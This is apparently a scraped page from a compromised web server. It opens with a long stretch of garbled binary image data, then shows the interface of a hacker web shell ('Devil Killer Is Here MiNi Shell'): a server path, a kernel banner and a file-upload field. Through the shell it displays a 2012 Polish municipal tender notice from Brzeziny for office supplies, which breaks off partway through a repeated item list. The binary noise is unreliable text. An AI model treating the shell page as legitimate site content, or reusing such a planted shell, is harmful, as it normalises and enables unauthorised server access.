JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120514/153380-N-2012.html

<p class="kh_header"><b>Brzeziny: ZAKUP Z DOSTAWĄ ARTYKUŁÓW  BIUROWYCH</b><br>
<b>Numer ogłoszenia: 153380 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Brzeziny , ul.  Sienkiewicza 16, 95-060 Brzeziny, woj. łódzkie, tel. 046 8742224, faks 046 8742793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeziny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP Z DOSTAWĄ ARTYKUŁÓW  BIUROWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza składanie ofert częściowych z zachowaniem podziału na poszczególne zadania.

ZADANIE Nr 1 -ZAKUP  Z DOSTAWĄ  MATERIAŁÓW  BIUROWYCH DLA POTRZEB URZĘDU MIASTA BRZEZINY

1	Arkusz spisu z natury uniwersalny wielokopia (bloczek po 50)	szt.	6;
2	Bloki listowe A4 96 kartek - kratka	szt. 	39;
3	bloki listowe A5 kratka - 96 kartek	szt.	42;
4	Cienkopis grubość linii pisania 0,4mm czerwony	szt.	57;
5	Cienkopis grubość linii pisania 0,4 mm czarny 	szt.	103;
6	Dziurkacz do 25 kartek	szt.	3;
7	dziurkacz do 65 kartek	szt.	10;
8	długopis z niebieskim żelowym wkładem, grubość linii 0,3 mm długość linii 900	szt.	96;
9	długopis z czarnym żelowym wkładem, grubość linii 0,3 mm długość linii 900	szt.	148;
10	Długopis automatyczny kulkowy z wymiennym wkładem	szt.	10;
11	Gumka	szt.	2;
12	Identyfikator 	szt.	100;
13	linijka 30 cm	szt.	16;
14	Kalkulator. 10-cyfrowy wyświetlacz. Cofanie ostatnio wprowadzonej pozycji. Klawisz podwójnego zera. Podwójne zasilanie. Plastikowe klawisze 	szt.	4;
15	Karteczki samoprzylepne 51x38mm (100 karteczek)	kostka	111;
16	karteczki samoprzylepne 75x75mm (100 karteczek)	kostka	109;
17	Klawiatura przewodowa podłączona do komputera za pomocą kabla PS/2. Posiada 104 klawisze.	szt.	10;
18	Klawiatura przewodowa podłączona do komputera za pomocą kabla USB. Posiada 104 klawisze.	szt.	5;
19	Klej w tubie 45 ml	szt.	7;
20	Klej w sztyfcie 35g	szt.	47;
21	Klipsy archiwalne 	szt.	405;
22	Koperty na płyty CD do wpinania	szt.	40;
23	Koperty białe samoklejące C6	szt.	18370;
24	Koperty białe samoklejące C5	szt.	5300;
25	Koperty białe samoklejące DL HK	szt.	410;
26	Koperty E4 HK białe	szt.	550;
27	Koperty białe B4 SK	szt.	100;
28	Koperty dowodowe PU-D-7	szt.	1000;
29	Koperty dowodowe PU-D-8	szt.	400;
30	korektor w taśmie szerokość ok. 4,2 mm długość ok. 6 m	szt.	22;
31	Korektor w piórze płaskim z metalową końcówką poj. 12ml	szt.	44;
32	Koszulki na dokumenty A4 do wpinania PCV wiotkie pakowne po 100 szt.	opakowanie	104;
33	Koszulki na dokumenty A5 do wpinania (pakowane po 100 szt.)	opakowanie	12;
34	Marker niezmywalny czarny	szt.	35;
35	Markery wielokolorowe do płyt CD/DVD + wymazywacz	szt.	5;
36	marker biały olejowy grubość 2,2 mm	szt.	2;
37	Mysz optyczna PS2	szt.	10;
38	Mysz optyczna USB	szt.	5;
39	Niszczarka (sposób niszczenia- ścinki, niszczenie płyt- CD/DVD, spinacze zszywki, jednorazowo do 12 kartek, poziom bezpieczeństwa DIN3)	szt.	1;
40	Nota korygująca A5 wielokopia samokopiujący	blk	3;
41	Nożyczki biurowe 16 cm	szt.	3;
42	ołówek zwykły HB	szt.	11;
43	ofertówka sztywne A4 opakowanie po 25 szt.	opakowanie	42;
44	Papier kserograficzny A4 80g/m2 białość 161 w skali CIE (ryza po 500 arkuszy)  ,wilgotność 3,8-5,0 procentach,grubość 108 um, gładkość 180 cm3/min, ryza	695;
45	Pendrive 8GB	szt.	5;
46	Płyta 700MB CDRW pakowana pojedynczo opak. Slim	szt.	25;
47	Płyta 800MB CDR pakowana pojedynczo opak. Slim 	szt.	150;
48	Płyta DVD+R 4,7GB pakowana pojedynczo opak. SLIM	szt.	60;
49	Poduszka do stępli tradycyjnych - 110x70 mm -czerwona	szt.	5;
50	Pinezki tablicowe (op. 50 szt.)	opakowanie	3;
51	Pinezki (opak.po 50 szt. ) 	opakowanie	17;
52	Pióro automatyczne żelowe grubość linii pisania 0,5mm uchwyt antypoślizgowy w 4 podstawowych kolorach	szt.	12;
53	Rozszywacz	szt.	1;
54	Segregator wykonany z tektury na zewnątrz pokryty folią PCV. Mechanizm dźwigowy. Szerokość grzbietu 50mm A4	szt.	178;
55	Segregator wykonany z tektury na zewnątrz pokryty folią PCV. Mechanizm dźwigowy. Szerokość grzbietu 75mm A4	szt.	211;
56	Skoroszyt kartonowy A4 hakowy pełny gramatura 280	szt.	175;
57	Skoroszyt z PCV przedni okładka przezroczysta twarda, tylna kolorowa. Boczna perforacja umożliwiająca wpięcie do segregatora A4 (kolor: zielony, granat, czarny)	szt.	570;
58	Skoroszyt oczkowy ? A4 gramatura 280	szt.	140;
59	skoroszyt oczkowy A4 pełny biały z nadrukiem gramatura 280	szt.	270;
60	Skoroszyt kartonowy A4 pełny zwykły biały z nadrukiem gramatura 280	szt.	400;
61	składanka komputerowa 240mm/12 oryg/kopia (900)	pud.	3;
62	Spinacze biurowe owalne długość 28 mm (opakowanie 100 szt.)	szt.	125;
63	Spinacze biurowe owalne długość50 mm (opakowanie po 100szt.)	szt.	87;
64	Spinacze krzyżowe o długości 41 mm (opakowanie 50 szt.)	szt.	14;
65	Sprężone powietrze do czyszczenia komputera 400 ml	szt.	22;
66	Tablica korkowa  w ramie drewnianej (90x120mm)	szt.	3;
67	Taśma do drukarki igłowej OKI 390FB	szt.	10;
68	Taśma do drukarki OKI 6300FB	szt.	20;
69	Taśma dwustronna  50x10	szt.	21;
70	Taśma pakowa 55mm x 66m  wytrzymała na zerwanie przezroczysta	szt.	27;
71	Taśma samoprzylepna zwykła 18mmx20m	szt.	49;
72	Taśma samoprzylepna usuwalna (można po niej pisać)	szt.	4;
73	Taśma HP DDS - 4 40 GB (C5718A)	szt.	10;
74	Teczka biała wiązana bez nadruku szt.	szt.	590;
75	Teczka akt osobowych sztywny grzbiet oklejana trzy przegródki z opisem 	szt.	10;
76	Temperówka aluminiowa pojedyńcza	szt.	2;
77	Toner do drukarki HP 1102 oryginał	szt.	30;
78	Toner do drukarki HP 1515 czarny (oryginał)	szt.	4;
79	toner do drukarki HP 1566 oryginał 	szt.	17;
80	Toner do drukarki HP 1005 (oryginał)	szt.	2;
81	Toner do drukarki HP laser jet 1300 oryginał 	szt.	8;
82	Toner do drukarki laserowej HP Laser jet 1020 oryginał	szt.	8;
83	Toner do drukarki HP Laser jet 1010 oryginał 	szt.	8;
84	Toner do drukarki laserowej HP 1200 oryginał 	szt.	2;
85	Toner do drukarki HP laser jet 1100 oryginał	szt.	3;
86	Toner do drukarki HP laser jet P1505 oryginał	szt.	5;
87	Toner do drukarki laserowej HP 1018 oryginał	szt.	9;
88	Toner do drukarki HP 2840 oryginał  - czerwony	szt.	4;
89	Toner do drukarki HP 2840 oryginał  -niebieski	szt.	6;
90	Toner do drukarki HP 2840 oryginał  - żółty	szt.	5;
91	Toner do drukarki HP 2840 oryginał  - czarny	szt.	6;
92	Toner do kopiarki IR2230 (oryginał)	szt.	8;
93	Toner do kopiarki IR2018 oryginał 	szt.	3;
94	Toner do kopiarki IR16 oryginał 	szt.	2;
95	Toner Kyocera FS1128 oryginał	szt.	12;
96	Toner Kyocera Taskalfa 250ci oryginał czarny	szt.	4;
97	toner kyocera TAskalfa 250ci oryginał czerwony	szt.	3;
98	toner kyocera TAskalfa 250ci oryginał  żółty	szt.	3;
99	toner kyocera TAskalfa 250ci oryginał niebieski	szt.	3;
100	toner kyocera TK130 oryginał	szt.	3;
101	Toner do drukarki XEROX PHSSER 3010 oryginał	szt.	3;
102	Tusz czerwony do pieczątek	szt.	6;
103	Tusz czarny do pieczątek	szt.	1;
104	Wkład wymienny do długopisów żelowych czerwony grubość linii pisania 1700 	szt.	36;
105	Wkład wymienny do długopisów żelowych czarny. Grubość linii 0,3mm długość linii 900mm 	szt.	159;
106	Wkład zwykły niebieski z zaczepem dł. 10,8 cm 	szt.	70;
107	wkład typu ZENITH niebieski 	szt.	164;
108	wkład wymienny do długopisu kulkowego niebieski	szt.	10;
109	wkład wymienny do długopisu kulkowego czarny	szt.	10;
110	wniosek o wydanie dowodu osobistego D-1 , format A-4 blok 80 kartek	blok	19;
111	Umowa zlecenie wraz z rachunkami wielokopia A4 	blok	5;
112	Zakreślacz grubość linii 1-5mm zielony 	szt.	35;
113	Zakreślacz grubość linii 1-5mm żółty 	szt.	44;
114	Zeszyt A5 60 kartek w kratkę	szt.	12;
115	Zeszyt A4 w kratkę-twarda okładka 	szt.	47;
116	Zszywki 23/6 (pudełko po 1000szt.)	pudełko	15;
117	Zszywki 23/13 (pudełko po 1000szt.)	pudełko	3;
118	Zszywki 23/10 (pudełko po 1000szt.)	pudełko	4;
119	Zszywki 23/8 (pudełko po 1000szt.)	pudełko	5;
120	Zszywki 23/6/1/4 (pudełko po 1000szt.)	pudełko	4;
121	Zszywki 24/6 (pudełko po 1000szt.)	pudełko	120;
122	Zszywki 26/6 (pudełko po 1000szt.)	pudełko	28;
123	zszywki Nr 10 (pudełko po 1000szt.)	pudełko	7;
124	zszywacz do 25 kartek 24/6 i 26/6	szt.	15;
125	zszywacz do 100 kartek 	szt.	5;
126	zszywacz długoramienny do 15 kartek	szt.	2;
127	Zwrotne poświadczenie odbioru (na zasadach kpa)	szt.	10450;
128	Zwrotne poświadczenie odbioru (ordynacja podatkowa)	szt.	4000.

 ZADANIE  Nr 2       

     ZAKUP Z DOSTAWĄ  MATERIAŁÓW BIUROWYCH NA POTRZEBY ZARZĄDZANIA PROJEKTEM  w ramach  projektu :Radosne przedszkole
 
Projekt pn: Radosne przedszkole   współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach Działanie:9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty  Poddziałanie:  9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej realizowany na podstawie zawartej umowy z Województwem Łódzkim nr UDA - POKL 09.01.01-10-065/10-00 z 11.01.2011 r.
1	koszulki A4 po 100 szt	komplety	1 ;
2	koszulki A5 po 100 szt	komplety	1; 
3	ofertówka sztywna A4 po 25 szt	komplety	3 ;
4	rozszywacz	szt.	1;
5	płyta 700 MB CDRW	szt.	25;
6	poduszka do stempli tradycyjnych - czerwona	szt.	1;
7	dziurkacz do 65 kartek	szt.	1;
8	karteczki samoprzylepne kostka 75 mmx 75 mm	szt.	3;
9	segregator 75 mm A4	szt.	10;
10	skoroszyt z PCV A4	szt.	100;
11	toner do drukarki HP 1566	szt.	3;
12	zakreślacz grubość linii 1-5 mm zielony i żółty	szt.	4 po 2 z każdego koloru;
13	zszywki 23/13	szt.	3;
14	zszywki 26/6	szt.	9;
15	tusz czerwony do pieczątek	szt	2;
16	papier kserograficzny A4 80g/m2 białość 161 w skali CIE (ryza po 500 arkuszy)  	ryza	40;
17	kalkulator	szt.	2;
18	klipsy archiwalne	szt.	50;
19	markery wielokolorowe do płyt+wymazywacz	szt.	2;
20	zszywacz do 100 kartek	szt.	1;
21	zszywacz do 25 kartek	szt.	1;
22	długopis automatyczny kulkowy	szt.	7;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 0,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu.
 Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu.
 Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu.
 Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu.
 Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu.
 Ocena spełniania warunku zostanie dokonana metodą spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.
2.Wszelkie zmiany i uzupełnienia  umowy wymagają formy pisemnej, pod rygorem nieważności.  
3. Zmiana umowy jest dopuszczalna w niżej wymienionym zakresie: 
a)	ceny brutto na wykonanie zamówienia publicznego jedynie w przypadku zmiany urzędowej stawki podatku od towaru i usług, 
b)	zmian regulacji prawnych,
c)	zmian adresowych stron umowy określonych w umowie,
d)	terminu realizacji usług,
e)	zmiany terminu realizacji umowy w przypadku prac uzupełniających lub dodatkowych,
f)	zmiany zakresu rzeczowego w przypadku, gdy zmiana ta wynika z okoliczności których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy. 
g)	danych objętych fakturą/rachunkiem, w szczególności NIP-u, adresu, nazwy lub numeru rachunku Wykonawcy w przypadku ich zmiany</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeziny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> : Urząd Miasta Brzeziny, ul. Sienkiewicza 16, pok.302, III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2012 godzina 11:30, miejsce: Urząd Miasta Brzeziny, ul. Sienkiewicza 16, pok.110, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie Nr 2 - Projekt pn: Radosne przedszkole   współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach Działanie:9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty  Poddziałanie:  9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej realizowany na podstawie zawartej umowy z Województwem Łódzkim nr UDA - POKL 09.01.01-10-065/10-00 z 11.01.2011 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZAKUP Z DOSTAWĄ ARTYKUŁÓW  BIUROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 1 -ZAKUP  Z DOSTAWĄ  MATERIAŁÓW  BIUROWYCH DLA POTRZEB URZĘDU MIASTA BRZEZINY

1	Arkusz spisu z natury uniwersalny wielokopia (bloczek po 50)	szt.	6;
2	Bloki listowe A4 96 kartek - kratka	szt. 	39;
3	bloki listowe A5 kratka - 96 kartek	szt.	42;
4	Cienkopis grubość linii pisania 0,4mm czerwony	szt.	57;
5	Cienkopis grubość linii pisania 0,4 mm czarny 	szt.	103;
6	Dziurkacz do 25 kartek	szt.	3;
7	dziurkacz do 65 kartek	szt.	10;
8	długopis z niebieskim żelowym wkładem, grubość linii 0,3 mm długość linii 900	szt.	96;
9	długopis z czarnym żelowym wkładem, grubość linii 0,3 mm długość linii 900	szt.	148;
10	Długopis automatyczny kulkowy z wymiennym wkładem	szt.	10;
11	Gumka	szt.	2;
12	Identyfikator 	szt.	100;
13	linijka 30 cm	szt.	16;
14	Kalkulator. 10-cyfrowy wyświetlacz. Cofanie ostatnio wprowadzonej pozycji. Klawisz podwójnego zera. Podwójne zasilanie. Plastikowe klawisze 	szt.	4;
15	Karteczki samoprzylepne 51x38mm (100 karteczek)	kostka	111;
16	karteczki samoprzylepne 75x75mm (100 karteczek)	kostka	109;
17	Klawiatura przewodowa podłączona do komputera za pomocą kabla PS/2. Posiada 104 klawisze.	szt.	10;
18	Klawiatura przewodowa podłączona do komputera za pomocą kabla USB. Posiada 104 klawisze.	szt.	5;
19	Klej w tubie 45 ml	szt.	7;
20	Klej w sztyfcie 35g	szt.	47;
21	Klipsy archiwalne 	szt.	405;
22	Koperty na płyty CD do wpinania	szt.	40;
23	Koperty białe samoklejące C6	szt.	18370;
24	Koperty białe samoklejące C5	szt.	5300;
25	Koperty białe samoklejące DL HK	szt.	410;
26	Koperty E4 HK białe	szt.	550;
27	Koperty białe B4 SK	szt.	100;
